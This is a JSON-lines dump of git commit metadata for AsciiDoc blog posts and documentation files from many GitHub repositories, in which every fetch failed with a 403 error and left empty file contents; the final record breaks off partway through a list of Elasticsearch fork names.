{"commit":"fa2053c9a57261f25042feeac435f155e2ccf112","subject":"Update 2015-10-17-Visualising-complex-systems-in-JS.adoc","message":"Update 2015-10-17-Visualising-complex-systems-in-JS.adoc","repos":"xmichaelx\/xmichaelx.github.io,xmichaelx\/xmichaelx.github.io","old_file":"_posts\/2015-10-17-Visualising-complex-systems-in-JS.adoc","new_file":"_posts\/2015-10-17-Visualising-complex-systems-in-JS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xmichaelx\/xmichaelx.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5e8b656e733bd976458392b830f2482e3c47fe0b","subject":"Update 2016-04-19-On-the-Subject-of-Finality.adoc","message":"Update 2016-04-19-On-the-Subject-of-Finality.adoc","repos":"reggert\/reggert.github.io,reggert\/reggert.github.io,reggert\/reggert.github.io,reggert\/reggert.github.io","old_file":"_posts\/2016-04-19-On-the-Subject-of-Finality.adoc","new_file":"_posts\/2016-04-19-On-the-Subject-of-Finality.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/reggert\/reggert.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d1d5fdd086c5bf2e0a177fe79a43eb18f6b0efea","subject":"Update 2016-11-23-what-buy-accepting-bitcoin.adoc","message":"Update 2016-11-23-what-buy-accepting-bitcoin.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-11-23-what-buy-accepting-bitcoin.adoc","new_file":"_posts\/2016-11-23-what-buy-accepting-bitcoin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"25afccf6bd6950c22d57c90a686063e70d6387c3","subject":"Update 2015-12-27-Useful-links.adoc","message":"Update 2015-12-27-Useful-links.adoc","repos":"azubkov\/azubkov.github.io,azubkov\/azubkov.github.io,azubkov\/azubkov.github.io","old_file":"_posts\/2015-12-27-Useful-links.adoc","new_file":"_posts\/2015-12-27-Useful-links.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/azubkov\/azubkov.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cc5a949dc629c3526247a7a6e44df681448872a7","subject":"Update 2015-08-14-MEGA-Link-Downloader-FAQ.adoc","message":"Update 2015-08-14-MEGA-Link-Downloader-FAQ.adoc","repos":"shinchiro\/shinchiro.github.io,shinchiro\/shinchiro.github.io,shinchiro\/shinchiro.github.io","old_file":"_posts\/2015-08-14-MEGA-Link-Downloader-FAQ.adoc","new_file":"_posts\/2015-08-14-MEGA-Link-Downloader-FAQ.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/shinchiro\/shinchiro.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cd635bcd00b3fdaf5744f706d5256d8abfbb9243","subject":"Update 2017-02-03-Azure-Machine-Learning-2.adoc","message":"Update 
2017-02-03-Azure-Machine-Learning-2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-03-Azure-Machine-Learning-2.adoc","new_file":"_posts\/2017-02-03-Azure-Machine-Learning-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"84f7754297837fe2ded2ee3ef3953acca3c479ac","subject":"Update 2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","message":"Update 2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","new_file":"_posts\/2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5b6e3557bfe0f901fa5351e702dd42ee149379a9","subject":"Update 2016-06-11-Como-usar-este-editor.adoc","message":"Update 2016-06-11-Como-usar-este-editor.adoc","repos":"LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io","old_file":"_posts\/2016-06-11-Como-usar-este-editor.adoc","new_file":"_posts\/2016-06-11-Como-usar-este-editor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LearningTools\/LearningTools.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c33040a72f670ce662e44496fb1d944fe34c817d","subject":"Update 2016-09-30-shortcutkey-taiouhyou.adoc","message":"Update 2016-09-30-shortcutkey-taiouhyou.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-30-shortcutkey-taiouhyou.adoc","new_file":"_posts\/2016-09-30-shortcutkey-taiouhyou.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6cc74ffc03516b5a2c203c6fc9de2bd9895b82fd","subject":"Update 2016-12-02-exhibition-booth-tour.adoc","message":"Update 2016-12-02-exhibition-booth-tour.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-02-exhibition-booth-tour.adoc","new_file":"_posts\/2016-12-02-exhibition-booth-tour.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"36682d5d076836706962d84a87f03eba87196948","subject":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","message":"Update 
2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a8caf93ff4724f5e69848d0f0e26dfe21db85ded","subject":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","message":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5b9284e6022a61332ffe12603d60c76f9ef7e3c4","subject":"Adding 0.6 release announcement","message":"Adding 0.6 release announcement\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2017-09-21-debezium-0-6-0-released.adoc","new_file":"blog\/2017-09-21-debezium-0-6-0-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ecdee60c71c83edbcb10a3fc34d7cfa1f6c631fa","subject":"Asciidoc format changes in Chrome Cache documentation","message":"Asciidoc format changes in Chrome Cache documentation\n\n","repos":"libyal\/dtformats,libyal\/dtformats","old_file":"documentation\/Chrome Cache file format.asciidoc","new_file":"documentation\/Chrome Cache file format.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/dtformats.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"94dc79f34cf2907734386b38855a357bd9f80f0e","subject":"Update 2017-05-07-Dont-forget-to-Reduce-the-number-of-Queries.adoc","message":"Update 2017-05-07-Dont-forget-to-Reduce-the-number-of-Queries.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-07-Dont-forget-to-Reduce-the-number-of-Queries.adoc","new_file":"_posts\/2017-05-07-Dont-forget-to-Reduce-the-number-of-Queries.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2dcfeb46ff2a130a9dbdfb21af2f129d014cf635","subject":"Update 2015-02-09-Test-2.adoc","message":"Update 2015-02-09-Test-2.adoc\n","repos":"filipeuva\/filipeuva.blog,filipeuva\/filipeuva.blog,filipeuva\/filipeuva.blog","old_file":"_posts\/2015-02-09-Test-2.adoc","new_file":"_posts\/2015-02-09-Test-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/filipeuva\/filipeuva.blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0a1bd40fa3c32932faa4a3d9050d7541885cf271","subject":"Update 2016-11-07-Monday.adoc","message":"Update 2016-11-07-Monday.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-07-Monday.adoc","new_file":"_posts\/2016-11-07-Monday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9fd3c52cef5063ca6c2801895b19104bad8ffadd","subject":"Update 2016-07-28-Muppets-Coming-to-the-Magic-Kingdom.adoc","message":"Update 2016-07-28-Muppets-Coming-to-the-Magic-Kingdom.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-07-28-Muppets-Coming-to-the-Magic-Kingdom.adoc","new_file":"_posts\/2016-07-28-Muppets-Coming-to-the-Magic-Kingdom.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c6db0599f723655ecf29c34553f6caaaceda5154","subject":"Update DS_Store-Breizhcamp-Saison-Breizhcamp-Saison-5.adoc","message":"Update DS_Store-Breizhcamp-Saison-Breizhcamp-Saison-5.adoc","repos":"Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io","old_file":"_posts\/DS_Store-Breizhcamp-Saison-Breizhcamp-Saison-5.adoc","new_file":"_posts\/DS_Store-Breizhcamp-Saison-Breizhcamp-Saison-5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ellixo\/ellixo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c771ad974624c98ef8cefeea9ccb071a3bf2ce66","subject":"Update 2017-03-26-Ngetes-Efek-Gitar-Pedal-AMT-P-1-MXR-Ten-Band.adoc","message":"Update 2017-03-26-Ngetes-Efek-Gitar-Pedal-AMT-P-1-MXR-Ten-Band.adoc","repos":"lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io","old_file":"_posts\/2017-03-26-Ngetes-Efek-Gitar-Pedal-AMT-P-1-MXR-Ten-Band.adoc","new_file":"_posts\/2017-03-26-Ngetes-Efek-Gitar-Pedal-AMT-P-1-MXR-Ten-Band.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lovian\/lovian.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"880dbe87d4494c2807bbe6497df57c4f10bad2ed","subject":"Update Micro-Service-Casual-Talkadoc-Microservice-Casual-Talks.adoc","message":"Update Micro-Service-Casual-Talkadoc-Microservice-Casual-Talks.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/Micro-Service-Casual-Talkadoc-Microservice-Casual-Talks.adoc","new_file":"_posts\/Micro-Service-Casual-Talkadoc-Microservice-Casual-Talks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"5c93066c61cde386bde2f94e9a0e4da11cdf4435","subject":"Update 2016-03-24-Tytul-posta.adoc","message":"Update 2016-03-24-Tytul-posta.adoc","repos":"oldkoyot\/oldkoyot.github.io,oldkoyot\/oldkoyot.github.io,oldkoyot\/oldkoyot.github.io,oldkoyot\/oldkoyot.github.io","old_file":"_posts\/2016-03-24-Tytul-posta.adoc","new_file":"_posts\/2016-03-24-Tytul-posta.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oldkoyot\/oldkoyot.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dcf39c4c02efc29dbcc1f160968038c28c087e89","subject":"Update 2016-07-13-Git-command.adoc","message":"Update 2016-07-13-Git-command.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-13-Git-command.adoc","new_file":"_posts\/2016-07-13-Git-command.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ba1a6bd84890176113ac068cfe7fc5b7c3eebbe5","subject":"Create testatoo.adoc","message":"Create testatoo.adoc","repos":"Ovea\/testatoo,Ovea\/testatoo","old_file":"testatoo-documentation\/doc\/testatoo.adoc","new_file":"testatoo-documentation\/doc\/testatoo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ovea\/testatoo.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"87777a07cdadb99a4f93bff6ba003e1ae2a3f343","subject":"Update 2016-05-21-Title.adoc","message":"Update 2016-05-21-Title.adoc","repos":"eimajenthat\/hubpress.io,eimajenthat\/hubpress.io,eimajenthat\/hubpress.io,eimajenthat\/hubpress.io","old_file":"_posts\/2016-05-21-Title.adoc","new_file":"_posts\/2016-05-21-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eimajenthat\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c9e203b16de0ec7135fef78eae6044fe53409b76","subject":"Update 2017-08-04-mecab.adoc","message":"Update 2017-08-04-mecab.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-04-mecab.adoc","new_file":"_posts\/2017-08-04-mecab.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"25ebc1b49ca3d90f2201eebec29089254aac9026","subject":"Update 2018-10-01-D3js1.adoc","message":"Update 2018-10-01-D3js1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-10-01-D3js1.adoc","new_file":"_posts\/2018-10-01-D3js1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"61687a0ba73c25c4a67ded070e9add8d51f2163d","subject":"Update Kaui_Guide_Draft (4) (1).adoc","message":"Update Kaui_Guide_Draft (4) (1).adoc","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/kaui\/Kaui_Guide_Draft (4) (1).adoc","new_file":"userguide\/kaui\/Kaui_Guide_Draft (4) (1).adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ba02f2c447ba7448f4b782f663e11e36041b7fe9","subject":"Update 2015-09-23-Garbage-Collection.adoc","message":"Update 2015-09-23-Garbage-Collection.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-23-Garbage-Collection.adoc","new_file":"_posts\/2015-09-23-Garbage-Collection.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ad0c10c2aa89ca0bca95c7b3aa6cb91446b015c7","subject":"y2b create post iPhone 6s or Galaxy S7?","message":"y2b create post iPhone 6s or Galaxy S7?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-08-23-iPhone-6s-or-Galaxy-S7.adoc","new_file":"_posts\/2016-08-23-iPhone-6s-or-Galaxy-S7.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"308e78b3e4957854d765886d9ffdf593eb48a192","subject":"Update 2016-11-05-Saturday-Remainder.adoc","message":"Update 2016-11-05-Saturday-Remainder.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-05-Saturday-Remainder.adoc","new_file":"_posts\/2016-11-05-Saturday-Remainder.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e39951011543df28b8499d9dd230a14c61465ffa","subject":"Update dbm-db-doc.adoc","message":"Update dbm-db-doc.adoc","repos":"jako512\/grails-database-migration,sbglasius\/grails-database-migration","old_file":"src\/docs\/asciidoc\/ref\/Documentation Scripts\/dbm-db-doc.adoc","new_file":"src\/docs\/asciidoc\/ref\/Documentation Scripts\/dbm-db-doc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jako512\/grails-database-migration.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"92fe15abd704bbe8ee6e8154451bdab5cdb4cd72","subject":"Document per-datasource auditLog.disabled config key","message":"Document per-datasource auditLog.disabled config key\n\n - see #147\n","repos":"tkvw\/grails-audit-logging-plugin,robertoschwald\/grails-audit-logging-plugin","old_file":"audit-logging\/src\/docs\/configuration.adoc","new_file":"audit-logging\/src\/docs\/configuration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/robertoschwald\/grails-audit-logging-plugin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"914dc634fd4806dc382617776754bfe306261bf6","subject":"Add java9-junit5 documentation","message":"Add java9-junit5 documentation\n","repos":"sormuras\/sawdust","old_file":"java9-junit5_de.adoc","new_file":"java9-junit5_de.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sormuras\/sawdust.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9043f7903a21807fd7990643a861820672fae4fb","subject":"Updated doc [skip ci]","message":"Updated doc [skip ci]","repos":"sk413025\/carcv,oskopek\/carcv,sk413025\/carcv,sk413025\/carcv,oskopek\/carcv,oskopek\/carcv,oskopek\/carcv,oskopek\/carcv,oskopek\/carcv,sk413025\/carcv,sk413025\/carcv,sk413025\/carcv","old_file":"docs\/howto-setup-environment-windows.adoc","new_file":"docs\/howto-setup-environment-windows.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sk413025\/carcv.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3b5208f8a01cd87b34b9068a7d887abfe412bc84","subject":"Update 2016-09-01-Swift-Tuple.adoc","message":"Update 2016-09-01-Swift-Tuple.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-01-Swift-Tuple.adoc","new_file":"_posts\/2016-09-01-Swift-Tuple.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8ba50ab52bc72683a69da58aa9d9ac7b0f47fc7b","subject":"Update 2016-10-03-Concept-Art.adoc","message":"Update 2016-10-03-Concept-Art.adoc","repos":"3991\/3991.github.io,3991\/3991.github.io,3991\/3991.github.io,3991\/3991.github.io","old_file":"_posts\/2016-10-03-Concept-Art.adoc","new_file":"_posts\/2016-10-03-Concept-Art.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/3991\/3991.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d038dd823c49f026e7b2b4c14d2daed95dee4537","subject":"Update 2019-02-10-RTFM-Part-1.adoc","message":"Update 2019-02-10-RTFM-Part-1.adoc","repos":"kr-b\/kr-b.github.io,kr-b\/kr-b.github.io,kr-b\/kr-b.github.io,kr-b\/kr-b.github.io","old_file":"_posts\/2019-02-10-RTFM-Part-1.adoc","new_file":"_posts\/2019-02-10-RTFM-Part-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kr-b\/kr-b.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"abcafb6feb4dee7d20d537f6b607fe9902d1c6e8","subject":"Update 2015-05-01-Noch-ein-Post.adoc","message":"Update 2015-05-01-Noch-ein-Post.adoc","repos":"pointout\/pointout.github.io,pointout\/pointout.github.io,pointout\/pointout.github.io","old_file":"_posts\/2015-05-01-Noch-ein-Post.adoc","new_file":"_posts\/2015-05-01-Noch-ein-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pointout\/pointout.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7d37cb5a35305f9e17c1659b2ef04274442eddb3","subject":"Update 2015-10-25-Back-to-Basic.adoc","message":"Update 2015-10-25-Back-to-Basic.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-10-25-Back-to-Basic.adoc","new_file":"_posts\/2015-10-25-Back-to-Basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7f77214cedbc927347241670be140b54185752c6","subject":"it's a `noop` operation, not a `none` operation. (#21736)","message":"it's a `noop` operation, not a `none` operation. (#21736)\n\nIt works I guess cause it's ignored as an invalid operation.","repos":"njlawton\/elasticsearch,mikemccand\/elasticsearch,rajanm\/elasticsearch,artnowo\/elasticsearch,naveenhooda2000\/elasticsearch,jprante\/elasticsearch,LewayneNaidoo\/elasticsearch,mjason3\/elasticsearch,nezirus\/elasticsearch,JackyMai\/elasticsearch,MisterAndersen\/elasticsearch,nknize\/elasticsearch,pozhidaevak\/elasticsearch,alexshadow007\/elasticsearch,jprante\/elasticsearch,nazarewk\/elasticsearch,wuranbo\/elasticsearch,glefloch\/elasticsearch,GlenRSmith\/elasticsearch,mortonsykes\/elasticsearch,IanvsPoplicola\/elasticsearch,njlawton\/elasticsearch,StefanGor\/elasticsearch,Helen-Zhao\/elasticsearch,fernandozhu\/elasticsearch,JackyMai\/elasticsearch,kalimatas\/elasticsearch,gfyoung\/elasticsearch,fred84\/elasticsearch,maddin2016\/elasticsearch,qwerty4030\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,JSCooke\/elasticsearch,geidies\/elasticsearch,kalimatas\/elasticsearch,alexshadow007\/elasticsearch,henakamaMSFT\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,bawse\/elasticsearch,vroyer\/elasticassandra,masaruh\/elasticsearch,LeoYao\/elasticsearch,spiegela\/elasticsearch,vroyer\/elassandra,geidies\/elasticsearch,winstonewert\/elasticsearch,scottsom\/elasticsearch,i-am-Nathan\/elasticsearch,bawse\/elasticsearch,ZTE-PaaS\/elasticsearch,gingerwizard\/elasticsearch,fernandozhu\/elasticsearch,nknize\/elasticsearch,MisterAndersen\/elasticsearch,a2lin\/elasticsearch,markwalkom\/elasticsearch,rlugojr\/elasticsearch,nilabhsagar\/elasticsearch,GlenRSmith\/elasticsearch,elasticdog\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,s1monw\/elasticsearch,HonzaKral\/elasticsearch,fforbeck\/elasticsearch,i-am-Nathan\/elasticsearch,mikemccand\/elasticsearch,StefanGor\/elasticsearch,bawse\/elasticsearch,JSCooke\/elasticsearch,i-am-Nathan\/elasticsearch,bawse\/elasticsearch,wangtuo\/elasticsearch,IanvsPoplicola\/elasticsearch,obourgain\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,JSCooke\/elasticsearch,Stacey-Gammon\/elasticsearch,masaruh\/elasticsearch,scottsom\/elasticsearch,brandonkearby\/elasticsearch,fred84\/elasticsearch,henakamaMSFT\/elasticsearch,nilabhsagar\/elasticsearch,vroyer\/elasticassandra,umeshdangat\/elasticsearch,s1monw\/elasticsearch,obourgain\/elasticsearch,LeoYao\/elasticsearch,i-am-Nathan\/elasticsearch,MaineC\/elasticsearch,qwerty4030\/elasticsearch,henakamaMSFT\/elasticsearch,mjason3\/elasticsearch,nazarewk\/elasticsearch,nazarewk\/elasticsearch,mortonsykes\/elasticsearch,alexshadow007\/elasticsearch,nezirus\/elasticsearch,C-Bish\/elasticsearch,fforbeck\/elasticsearch,rajanm\/elasticsearch,ZTE-PaaS\/elasticsearch,MisterAndersen\/elasticsearch,maddin2016\/elasticsearch,winstonewert\/elasticsearch,mohit\/elasticse
arch,rajanm\/elasticsearch,wenpos\/elasticsearch,s1monw\/elasticsearch,jimczi\/elasticsearch,jimczi\/elasticsearch,brandonkearby\/elasticsearch,qwerty4030\/elasticsearch,lks21c\/elasticsearch,LeoYao\/elasticsearch,geidies\/elasticsearch,JackyMai\/elasticsearch,rajanm\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,winstonewert\/elasticsearch,bawse\/elasticsearch,nezirus\/elasticsearch,pozhidaevak\/elasticsearch,umeshdangat\/elasticsearch,sneivandt\/elasticsearch,mortonsykes\/elasticsearch,rlugojr\/elasticsearch,artnowo\/elasticsearch,MisterAndersen\/elasticsearch,StefanGor\/elasticsearch,strapdata\/elassandra,artnowo\/elasticsearch,alexshadow007\/elasticsearch,gingerwizard\/elasticsearch,strapdata\/elassandra,MaineC\/elasticsearch,markwalkom\/elasticsearch,scorpionvicky\/elasticsearch,geidies\/elasticsearch,robin13\/elasticsearch,mohit\/elasticsearch,elasticdog\/elasticsearch,masaruh\/elasticsearch,geidies\/elasticsearch,masaruh\/